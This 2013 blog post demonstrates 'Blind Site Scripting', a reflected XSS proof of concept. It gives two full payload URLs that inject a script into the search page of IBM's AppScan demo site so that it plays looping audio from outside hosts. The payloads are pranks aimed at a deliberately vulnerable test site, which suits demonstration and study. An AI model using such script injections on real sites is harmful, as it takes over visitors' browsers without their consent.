Monday, July 15, 2013

Blind Site Scripting

Alexis and I were having a bright moment after siesta time and decided to put into practice a "brand new" attack... well, probably somebody has already done this, but at least we haven't seen it out there before. As usual it had to be something fun and probably silly to keep us motivated.

Ladies and gentlemen, please welcome "Blind Site Scripting" a.k.a. BSS! ... never before has XSS talked to its victims!

Here is the PoC; it needs Firefox and speakers on (tested on Firefox 29.0 on May 3rd 2014):

http://testfire.net/search.aspx?txtSearch=<h1>Blind Site Scripting!</h1><script>var audio = new Audio();audio.src ='http://speechutil.com/convert/ogg?text=Hello%20Everybody%21%20this%20is%20a%20blind%20site%20scripting';audio.loop=true;audio.play();</script>

The video showing Blind Site Scripting in action:

[embedded video]


Feel free to edit the text following the "text" parameter above. Of course, you can also embed sound files directly, as in the example below:

http://testfire.net/search.aspx?txtSearch=<h1>Blind Site Scripting!</h1><script>var audio = new Audio();audio.src ='http://sesaworuban.net/downloads/con_dance_mp3s/06 Macarena.mp3';audio.loop=true;audio.play();</script>

So, as you can see, using text-to-speech or recorded files we can play audio and use it as a payload in our XSS scenarios, thanks to HTML5 features such as the Audio element.


Some additional notes/disclaimers:
  • Of course, you must first find an XSS-vulnerable page. Here we are using IBM's AppScan demo site.
  • You would also need a text-to-speech service; I know at some point speechutil.com will go down and it won't work.
  • Tested on Firefox. IE and Chrome would stop non-obfuscated XSS like this.
  • If it doesn't work, I am sure you will make it work eventually... this is not rocket science :)